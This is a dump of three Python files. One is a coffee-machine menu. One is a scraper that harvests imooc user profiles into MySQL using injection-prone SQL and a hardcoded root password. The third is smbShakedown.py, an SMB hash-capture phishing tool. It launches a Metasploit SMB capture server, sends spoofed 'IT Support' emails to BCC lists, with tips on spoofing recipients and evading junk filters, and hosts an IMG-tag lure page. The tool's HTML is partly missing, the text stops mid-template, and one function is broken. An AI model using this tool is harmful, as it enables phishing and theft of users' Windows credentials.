+{"seq_id": "597844299", "text": "import os\n\n#from lib.coffee.types_of_coffee import Americano, Latte, Cappuccino, Espresso\nfrom lib.coffee.types_of_coffee import TypesOfCoffee\nfrom lib.machine.coffee_machine import CoffeMachine\n\n\nclass Menu(object):\n def __init__(self):\n self.machine = CoffeMachine()\n\n def wait_action(self):\n return input(\"Press [Enter] to continue...\")\n\n def make_coffee(self):\n print(\"Choose your coffee:\")\n drinks = [TypesOfCoffee().Latte.name,\n TypesOfCoffee().Espresso.name,\n TypesOfCoffee().Cappuccino.name,\n TypesOfCoffee().Americano.name, \"Exit\"]\n for i, option in enumerate(drinks):\n print(\"[{}] {}\".format(str(i + 1), drinks[i]))\n\n choice = int(input(\"Enter your choice [1-5]: \" )) - 1\n if choice in range(0, 4):\n self.machine.brewingCoffe(int(choice))\n self.wait_action()\n elif choice == 4:\n print(\"Exit from Make Coffee\")\n return\n else:\n print(\"There is no such a drink!\")\n self.wait_action()\n\n\n def fill_coffeeMachine(self):\n self.machine.fill()\n self.wait_action()\n\n def filter_coffeeMachine(self):\n self.machine.add_filter()\n self.wait_action()\n\n def turn_on_coffeeMachine(self):\n self.machine.turn_on()\n self.wait_action()\n\n def turn_off_coffeeMachine(self):\n self.machine.turn_off()\n self.wait_action()\n\n def remove_grounds_from_coffeMachine(self):\n self.machine.removeGrounds()\n self.wait_action()\n\n def show_status(self):\n print(\"Current state of Coffee Machine:\")\n print(\"Water: {}\".format(self.machine.water_supply.level))\n print(\"Milk: {}\".format(self.machine.milk_supply.level))\n print(\"Beans: {}\".format(self.machine.supply_of_coffee_beans.level))\n print(\"Ground: {}\".format(self.machine.ground.level))\n print(\"Is Filter: {}\".format(self.machine.filter))\n print(\"Turn on: {}\".format(self.machine.power_button))\n self.wait_action()\n\n def main_menu(self):\n self.options = [\"Show the state of the Coffee Machine\",\"Make Coffee\",\n \"Fill the machine\", \"Add filter\", \"Turn on Coffee Machine\",\n \"Turn off Coffee Machine\", \"Remove grounds\", \"Exit\"]\n\n for i, option in enumerate(self.options):\n print(\"[{}] {}\".format(str(i+1),self.options[i]))\n", "sub_path": "lib/menu/main_menu.py", "file_name": "main_menu.py", "file_ext": "py", "file_size_in_byte": 2447, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "lib.machine.coffee_machine.CoffeMachine", "line_number": 10, "usage_type": "call"}, {"api_name": "lib.coffee.types_of_coffee.TypesOfCoffee", "line_number": 17, "usage_type": "call"}, {"api_name": "lib.coffee.types_of_coffee.TypesOfCoffee", "line_number": 18, "usage_type": "call"}, {"api_name": "lib.coffee.types_of_coffee.TypesOfCoffee", "line_number": 19, "usage_type": "call"}, {"api_name": "lib.coffee.types_of_coffee.TypesOfCoffee", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "42185256", "text": "#!/usr/bin/env python\n\n# -*- encoding: utf-8 -*-\n\n\"\"\"\n@Author : Amelia \n@Contact : yu_mengling@hust.edu.cn\n@File : test_userdetail.py\n \n@Time : 18-7-17 下午9:50\n\"\"\"\n\n''' 慕课网用户页'''\n# import threading\n\nimport time\nfrom typing import Dict, Any, Union\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pymysql\n\n\n# 慕课网 python\n# https://www.imooc.com/u/1857206/courses 第一个用户? 到6946586\n# url中有两个变量: user_id, page_num\n\nFIRST_USER = 1857210 # 1857206\nLAST_USER = 6946586 # 6900000\nuser_id = 1857206 # the first user #2481691\n\nbase_url = 'https://www.imooc.com/u/'\npage_url = '/courses?page=' # + page_num # 可能有多个page\n# url = 'https://ke.qq.com/course/list/python'\n\nheaders = {'user-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'}\n\n# urls = []\n# def generate_urls(FIRST_USER, LAST_USER):\n# rLock = threading.RLock()\n\n\nfor user_id in range(FIRST_USER, LAST_USER):\n user_url = base_url + str(user_id) + '/courses'\n res = requests.get(user_url, headers=headers)\n if res.status_code != 200:\n print('user %s not exist' % user_id)\n break\n\n html_doc = res.text\n # print(html_doc)\n soup = BeautifulSoup(html_doc, 'html.parser')\n # course_list = soup.find_all(\"div\",class_=\"course-list-cont\")\n # # print course_list\n # for course in course_list:\n # print course\n\n user_detail = soup.find('div', class_='user-info clearfix')\n user_info = {}\n user_info['sex'] = '无'\n user_info['province'] = '无'\n user_info['city'] = '无'\n user_info['city'] = '无'\n user_info['career'] = '无'\n\n user_info['user_id'] = user_id\n user_info['user_pic_url'] = user_detail.find('img')['src']\n user_info['user_name'] = user_detail.find('h3', class_='user-name clearfix').span.get_text()\n\n about = user_detail.find('p', class_='about-info').contents\n\n about_name_list = ['sex', 'province', 'city', 'career']\n for i, sp in enumerate([x for x in about[:-2] if x != '\\n']):\n user_info[about_name_list[i]] = sp.get_text().strip()\n\n user_info['user_sign'] = user_detail.find('p', class_='user-desc').get_text()\n\n study_info = user_detail.find_all('div', class_='item follows')\n study_info_name_list = ['total_study_duration', 'exp', 'coins', 'follows', 'fans']\n for i, st in enumerate(study_info):\n st_text = st.get_text().strip().split('\\n')\n user_info[study_info_name_list[i]] = st_text[0]\n try:\n page_info = soup.find('div', class_='page').contents\n page_num = int(page_info[-1]['href'].split('=')[-1])\n except:\n page_num = 1\n\n # for k in user_info.keys():\n # print('%s:%s' % (k, user_info[k]))\n\n # --------------------------------------------------------------------------------------------------\n # 将用户基本数据写入数据库\n\n sql_user = 'INSERT INTO user_basic_info (' \\\n 'user_id,user_name, sex, user_pic_url, user_sign, province, city, career, total_study_duration,'\\\n 'exp, coins, follows, fans) ' \\\n 'VALUES (%d, \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', %d, %d, %d, %d);' % \\\n (int(user_info['user_id']), user_info['user_name'], user_info['sex'], user_info['user_pic_url'],\n user_info['user_sign'], user_info['province'],user_info['city'], user_info['career'],\n user_info['total_study_duration'],\n int(user_info['exp']), int(user_info['coins']), int(user_info['follows']), int(user_info['fans']))\n print(sql_user)\n\n # 打开数据库连接\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"IMOOC_COURSE\", use_unicode=True, charset=\"utf8\")\n # 使用 cursor() 方法创建一个游标对象 cursor\n 
cursor = db.cursor()\n # 使用 execute() 方法执行 SQL 语句\n # 一页内的数据,按条插入数据库\n\n # cursor.execute(sql)\n try:\n # 执行sql语句\n cursor.execute(sql_user)\n # 提交到数据库执行\n db.commit()\n print(\"[ok] user info: commit to database\")\n except:\n # 如果发生错误则回滚\n db.rollback()\n\n # 关闭数据库连接\n db.close()\n\n # time.sleep(2)\n\n # -------------------------------------------------------------------------------------------------\n # ???\n # https: // www.imooc.com / u / 1857211 / courses?page = 1\n # Traceback(most recent call last): File\n # \"/home/amelia/program-basic/Online-Education-Analysis/imooc_spider/test_userdetail.py\", line 150, in < module >\n # study_time = course.find('span').get_text().strip()\n # AttributeError: 'NoneType' object has no attribute 'find'\n for page_id in range(1, page_num+1):\n url = base_url + str(user_id) + page_url + str(page_id)\n print(url)\n res = requests.get(url, headers=headers)\n if res.status_code != 200:\n print('user %s not exist' % user_id)\n continue\n html_doc = res.text\n # print(html_doc)\n soup = BeautifulSoup(html_doc, 'html.parser')\n first_course = soup.find(\"div\", class_=\"clearfix tl-item tl-item-first\")\n course_list = soup.find_all(\"div\", class_=\"clearfix tl-item \")\n\n course_list.insert(0, first_course)\n\n page_pro = []\n\n if course_list is None:\n continue\n for course in course_list:\n # print(course)\n study_time = course.find('span').get_text().strip()\n year, date = study_time.split('\\n')\n\n cour = course.find_all('div', class_=\"course-list-cont\")\n for cha in cour:\n pro = {}\n pro['user_id'] = user_id\n pro['recent_study_date'] = year + u'年' + date\n h3 = cha.find('h3', class_='study-hd').find('a')\n pro['course_name'] = h3.get_text()\n pro['course_url'] = h3['href']\n\n # h3 = cha.find('h3', class_='study-hd').find('a')\n # pro['course_name'] = h3.get_text()\n # pro['course_id'] = h3['href']\n\n study_points = cha.find('div', class_='study-points').contents\n pro['has_learn'] = study_points[1].get_text()[2:]\n pro['time_consuming'] = study_points[3].get_text()\n pro['study_to'] = study_points[5].get_text()\n\n catog_points = cha.find('div', class_='catog-points').contents\n pro['note_num'] = catog_points[1].get_text()[3:]\n pro['code_num'] = catog_points[3].get_text()[3:]\n pro['ques_num'] = catog_points[5].get_text()[3:]\n\n # for k in pro.keys():\n # print('%s:%s' % (k, pro[k]))\n # print('\\n')\n page_pro.append(pro)\n\n # print(page_pro)\n # 打开数据库连接\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"IMOOC_COURSE\", use_unicode=True, charset=\"utf8\")\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # 使用 execute() 方法执行 SQL 语句\n # 一页内的数据,按条插入数据库\n\n for p in page_pro:\n sql = 'INSERT INTO user_learn_detail (' \\\n 'user_id, course_url, course_name, recent_study_date, has_learn, time_consuming, study_to,' \\\n 'note_num, code_num, ques_num) ' \\\n 'VALUES (%d, \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\', \\'%s\\',' \\\n ' %d, %d, %d);' % \\\n (int(p['user_id']), p['course_url'], p['course_name'], p['recent_study_date'],\n p['has_learn'], p['time_consuming'], p['study_to'],\n int(p['note_num']), int(p['code_num']), int(p['ques_num']))\n print(sql)\n\n try:\n # 执行sql语句\n cursor.execute(sql)\n # 提交到数据库执行\n db.commit()\n print(\"ok! 
commit to database\")\n\n except:\n # 如果发生错误则回滚\n db.rollback()\n\n # 关闭数据库连接\n db.close()\n\n time.sleep(3)\n\n\n# if __name__ == '__main__':\n# pass\n", "sub_path": "imooc_spider/test_userdetail.py", "file_name": "test_userdetail.py", "file_ext": "py", "file_size_in_byte": 8262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 52, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 106, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 138, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 144, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 189, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 220, "usage_type": "call"}]}
+{"seq_id": "468455150", "text": "#!/usr/bin/env python\n# Description: A simplified SMB Email Client Attack script.\n# Created by: Nick Sanzotta / @beamr\n# Version: smbShakedown.py v 1.10252016.b\nimport os, sys, smtplib, getpass, readline, socket, time, subprocess\nimport urllib, json\nimport readline\nreadline.parse_and_bind(\"tab: complete\")\nimport SocketServer, SimpleHTTPServer, multiprocessing\n\nrcfile = 'smbServ.rc'\n\nclass colors:\n\twhite = \"\\033[1;37m\"\n\tnormal = \"\\033[0;00m\"\n\tred = \"\\033[1;31m\"\n\tblue = \"\\033[1;34m\"\n\tgreen = \"\\033[1;32m\"\n\tx = \"\\033[1;35m\"\n\nbanner = colors.x + r\"\"\"\n __ \n /\\ \\ \n ____ ___ ___\\ \\ \\____ \n /',__\\ /' __` __`\\ \\ '__`\\ \n/\\__, `\\/\\ \\/\\ \\/\\ \\ \\ \\L\\ \\\n\\/\\____/\\ \\_\\ \\_\\ \\_\\ \\_,__/\n \\/___/ \\/_/\\/_/\\/_/\\/___/ \n\n ____ __ __ __ \n/\\ _`\\ /\\ \\ /\\ \\ /\\ \\ \n\\ \\,\\L\\_\\ \\ \\___ __ \\ \\ \\/'\\ __ \\_\\ \\ ___ __ __ __ ___ \n \\/_\\__ \\\\ \\ _ `\\ /'__`\\ \\ \\ , < /'__`\\ /'_` \\ / __`\\/\\ \\/\\ \\/\\ \\ /' _ `\\ \n /\\ \\L\\ \\ \\ \\ \\ \\/\\ \\L\\.\\_\\ \\ \\\\`\\ /\\ __//\\ \\L\\ \\/\\ \\L\\ \\ \\ \\_/ \\_/ \\/\\ \\/\\ \\ \n \\ `\\____\\ \\_\\ \\_\\ \\__/.\\_\\\\ \\_\\ \\_\\ \\____\\ \\___,_\\ \\____/\\ \\___x___/'\\ \\_\\ \\_\\\n \\/_____/\\/_/\\/_/\\/__/\\/_/ \\/_/\\/_/\\/____/\\/__,_ /\\/___/ \\/__//__/ \\/_/\\/_/\n\n\"\"\"+'\\n' \\\n+ colors.x + '\\n smbShakedown.py v1.10252016.b' \\\n+ colors.normal + '\\n Description: A simplified SMB Email Client Attack script.'\\\n+ colors.normal + '\\n Created by: Nick Sanzotta/@beamr' + '\\n'\\\n+ colors.normal + ' ' + '*' * 95 +'\\n' + colors.normal\n\ndef cls():\n\tos.system('cls' if os.name == 'nt' else 'clear')\n\ndef get_external_address():\n\tdata = json.loads(urllib.urlopen(\"http://ip.jsontest.com/\").read())\n\tprint(\"External IP: \"+data[\"ip\"])\n\treturn data[\"ip\"]\n\ndef get_internal_address():\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ts.connect((\"8.8.8.8\", 80))\n\tprint(\"Internal IP: \"+s.getsockname()[0])\n\treturn s.getsockname()[0]\n\ndef yes_no(answer):\n\tyes = set(['yes','y', 'ye', ''])\n\tno = set(['no','n'])\n\t \n\twhile True:\n\t\tchoice = raw_input(answer).lower()\n\t\tif choice in yes:\n\t\t return True\n\t\telif choice in no:\n\t\t return False\n\t\telse:\n\t\t\tprint ('Please respond with \\'yes\\' or \\'no\\'\\n')\n\ndef smbServ():\n\t'''starts a metasploit smb capture server in a tmux session called msf_shakedown'''\n\tsmb_server_option = self.yes_no('Use a local Metasploit SMB capture server in a screen session called msf_shakedown? (y/n): ')\n\t#FEATURE need to allow a choice of internal or external ip?\n\tif smb_server_option is True:\n\t\trc_config = \\\n\t\t'use auxiliary/server/capture/smb\\n'+\\\n\t\t'set srvhost {}\\n'.format(self.internal_ip)+\\\n\t\t'set JOHNPWFILE /opt/smbShakedown/smb_hashes\\n'+\\\n\t\t'exploit -j -z'\n\t\tprint('\\n{}\\n').format(str(rc_config))\n\t\t#prompt user to ok the rc file config\n\t\tvalidate_rc_file = self.yes_no('rc file ready to execute? 
(y/n): ')\n\t\t#if they ok the file\n\t\tif validate_rc_file is True:\n\t\t\t#write the file\n\t\t\twith open(self.rc_file, 'w') as rc_file:\n\t\t\t\trc_file.writelines(str(rc_config))\n\t\t\t\trc_file.close()\n\t\t\t#use subprocess to open tmux new session and run msfconsole in it \n\t\t\ttry:\n\t\t\t\tprint('Starting tmux...')\n\t\t\t\tproc = subprocess.Popen(['tmux', 'new-session', '-d', '-s', 'msf_shakedown',\\\n\t\t\t\t 'msfconsole -q -r {}'.format(self.rc_file)], stdout=subprocess.PIPE)\n\t\t\t\t(out, err) = proc.communicate()\n\t\t\t\tprint('Screen sessions: {}'.format(out))\n\t\t\texcept Exception as e:\n\t\t\t\tprint('Error: {}'.format(e))\n\t\t\t\tsys.exit(1)\n\t\t#if user opts to not run msfconsole smb capture locallly, provide a sample rc file\n\t\telse:\n\t\t\tprint('You\\'ll need to provide your own rc file. Here\\'s a sample')\n\t\t\tprint('use auxiliary/server/capture/smb\\n\\\nset srvhost \\n\\\nset JOHNPWFILE /opt/smbShakedown/smb_hashes\\n\\\nexploit -j -z')\n\n\n\n\ndef smtpConn(smtpServerAddress, smtpServerPort, smtpUser, smtpPassword, senderAddress, recipientAddress, emailMessage):\n\tsmtpserver = smtplib.SMTP(smtpServerAddress, smtpServerPort)\n\tsmtpserver.ehlo()\n\tsmtpserver.starttls()\n\tsmtpserver.ehlo\n\tsmtpserver.login(smtpUser, smtpPassword)\n\tprint(\"Testing Connection to your SMTP Server...\")\n\ttime.sleep(1)\n\ttry:\n\t\tstatus = smtpserver.noop()[0]\n\t\tprint(\"SMTP Server Status: \",status)\n\t\t\n\t\tsendOption = yes_no('Connection to SMTP Server is successful, would you like to send mail now? (y/n): ')\n\n\t\tif sendOption is True:\n\t\t\tsmtpserver.sendmail(senderAddress, recipientAddress, emailMessage)\n\t\t\tprint(\"Message(s) sent!\")\n\t\t\tsmtpserver.quit()\n\t\t\treturn True\n\t\telse:\n\t\t\tsmtpserver.quit()\n\t\t\tprint(\"Ok no mail sent.\")\n\t\t\treturn False\n\n\n\t\t'''sendOption = raw_input(\"Connection to SMTP Server is successful, would you like to send mail now?[yes]:\") or 'yes'\n\t\t\n\n\t\tchoice = sendOption.lower()\n\t\tyes = set(['yes','y', 'ye', ''])\n\t\tno = set(['no','n'])\n\t\tprint('ENTERED: \"%s\"' % choice + \"\\n\")\n\t\tif choice in yes:\n\t\t\tsmtpserver.sendmail(senderAddress, recipientAddress, emailMessage)\n\t\t\tprint(\"Message(s) sent!\")\n\t\t\tsmtpserver.quit()\n\t\t\treturn True\n\t\telif choice in no:\n\t\t\tsmtpserver.quit()\n\t\t\tprint(\"Ok no mail sent.\")\n\t\t\treturn False\n\t\telse:\n\t\t\tsys.stdout.write(\"Please respond with 'yes' or 'no'\")'''\n\n\n\texcept:\n\t\tstatus = -1\n\t\tprint(\"[Aborting]SMTP Server Status: \",status)\n\treturn True if status == 250 else False\n\ndef main():\n\tcls()\n\tprint(banner)\n\ttry:\n\t\textipAddress = get_external_address()\n\texcept IOError:\n\t\tprint(\"Check your Internet connection\")\n\t\tsys.exit(0)\n\tipAddress = get_internal_address()\n\t#duplicate\n\t#ipAddress = get_internal_address()\n\tprint(\"\\n\")\n\tsmtpServerAddress = raw_input('Enter SMTP Server address[smtp.gmail.com]: ') or 'smtp.gmail.com'\n\tprint('ENTERED: \"%s\"' % smtpServerAddress + \"\\n\")\n\tsmtpServerPort = raw_input('Enter your SMTP Server Port[587]: ') or 587\n\tprint('ENTERED: \"%s\"' % smtpServerPort + \"\\n\")\n\tsmtpUser = raw_input('Enter SMTP Server username[****@gmail.com]: ')\n\tprint('ENTERED: *****\\n')\n\tsmtpPassword = getpass.getpass(r'Enter SMTP Server password: ')\n\tprint(\"\\n\")\n\tsenderName = raw_input('Enter \"from name\":[IT Support]') or 'IT Support'\n\tprint('ENTERED:' \"%s\" % senderName + \"\\n\")\n\tsenderAddress = raw_input('Enter \"from 
address\":[itsupport@company.com]') or 'itsupport@company.com'\n\tprint('ENTERED:' \"%s\" % senderAddress + \"\\n\")\n\trecipientName = raw_input('Enter recipient(s) name[Company Staff]: ') or 'Company Staff'\n\tprint('ENTERED:' \"%s\" % recipientName + \"\\n\")\n\tprint('TIP: This will help avoid the orange \"?\" and/or Spoof the recipient. Default value usually works.')\n\trcptHeader = raw_input('Enter recipient address for the email header[staff@company.com]') or 'staff@company.com'\n\tprint('ENTERED:' \"%s\" % rcptHeader + \"\\n\")\n\ttry:\n\t\tprint('TIP: For multiple addresses, enter a file or seperate with a comma\\n'\\\n\t\t'EX:/opt/emailAddresses.txt or user1@company.com,user2@company.com')\n\t\trawrcptAddress = raw_input('Enter BCC recipient addresses[File or individual email(s)]): ')\n\t\tprint('ENTERED:' \"%s\" % rawrcptAddress + \"\\n\")\n\t\twith open(rawrcptAddress, 'r') as f1:\n\t\t\tx = f1.read()\n\t\trecipientAddress = x.split()\n\t\tprint(recipientAddress)\n\t\tprint(\"\\n\")\n\texcept IOError:\n\t\trecipientAddress=rawrcptAddress.split(',')\n\t\tprint('ENTERED:' \"%s\" % recipientAddress + \"\\n\")\n\tsmbCaptureServer = raw_input('Enter SMB Capture Server IP address['+extipAddress+']: ') or extipAddress\n\tprint('ENTERED:' \"%s\" % smbCaptureServer + \"\\n\")\n\t#HYPER LINK OPTIONS\n\tprint('TIP: A HyperLink can be directed to an Webpage with an HTML IMG Tag.')\n\n\t#use yes_no function instead of inline\n\t#hyperLinkOption = raw_input('Would you like to add a HyperLink to your message?[yes]: ') or 'yes'\n\thyperLinkOption = yes_no('Would you like to add a HyperLink to your message? (y/n): ')\n\n\t'''print('ENTERED:' \"%s\" % hyperLinkOption + \"\\n\")\n\tchoice = hyperLinkOption.lower()\n\tyes = set(['yes','y', 'ye', ''])\n\tno = set(['no','n'])\n\tif choice in yes:'''\n\n\tif hyperLinkOption is True:\n\t\tprint('TIP: Domain based HyperLinks help avoid the \"JunkFolder\".')\n\t\thyperAddress = raw_input('Please enter a addresss without \"http://\": ['+extipAddress+']:' ) or extipAddress\n\t\tprint(\"ENTERED: \" \"%s\" % \"http://\"+hyperAddress+\"/\" + \"\\n\")\n\t\thyperText = raw_input('Enter text for Hyperlink to be displayed[CLICK ME!]: ') or 'CLICK ME!'\n\t\tprint(\"ENTERED: \" \"%s\" % hyperText + \"\\n\")\n\t\thyperLink = ''+hyperText+'' \n\t\t#HTTP Server OPTIONS\n\t\tprint('TIP: You can point your HyperLink to a locally hosted Webpage.')\n\t\t\n\n\t\t#use yes_no function instead of inline\n\t\t#httpServOption = raw_input(\"Host local Webpage with an HTML IMG Tag?[yes]: \") or 'yes'\n\t\t\n\t\thttpServOption = yes_no('Host local Webpage with an HTML IMG Tag? (y/n)? ')\n\t\t'''print('ENTERED:' \"%s\" % httpServOption + \"\\n\")\n\t\tchoice = httpServOption.lower()\n\t\tyes = set(['yes','y', 'ye', ''])\n\t\tno = set(['no','n'])\n\t\tif choice in yes:'''\n\t\tif httpServOption is True:\n\t\t\thttpPort = raw_input(\"HTTP Server Port?:[80]\") or 80\n\t\t\tprint('ENTERED:' \"%s\" % httpPort + \"\\n\")\n\t\t\tprint(\"\\n\")\n\t\t\tprint(\"TIP: Coming soon...\")\n\t\t\t#Redirect OPTIONS\n\t\t\t\n\t\t\t#use yes_no function instead of inline\n\t\t\t#redirectOption = raw_input(\"Would you like a redirect on your Webpage?[yes]:\") or 'yes'\n\t\t\tredirectOption = yes_no('Would you like a redirect on your Webpage? 
(y/n): ')\n\n\t\t\t'''print('ENTERED:' \"%s\" % redirectOption + \"\\n\")\n\t\t\tchoice = redirectOption.lower()\n\t\t\tyes = set(['yes','y', 'ye', ''])\n\t\t\tno = set(['no','n'])\n\t\t\tif choice in yes:'''\n\n\t\t\tif redirectOption is True:\n\t\t\t\tredirect = raw_input('Enter redirect address[ex: client-site.com]:') or ''\n\t\t\t\tprint('ENTERED:' \"%s\" % redirect + \"\\n\")\n\t\t\telse:\n\t\t\t\tprint('Okay, Webpage will not redirect.')\n\t\t\t\tredirect = ''\n\t\t\t'''else:\n\t\t\t\tsys.stdout.write(\"Please respond with 'yes' or 'no'\")'''\n\n\t\t### EDIT: HTML Template Below ###\n\t\t### Be careful not to remove the variables {0} and {1} ###\n\t\t\thtml = \"\"\"\n\t\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\tSMB Egress Test Page.\n\t\t\t\n\t\t\t
\n\t\t\t
\n\t\t\t\n\t\t\t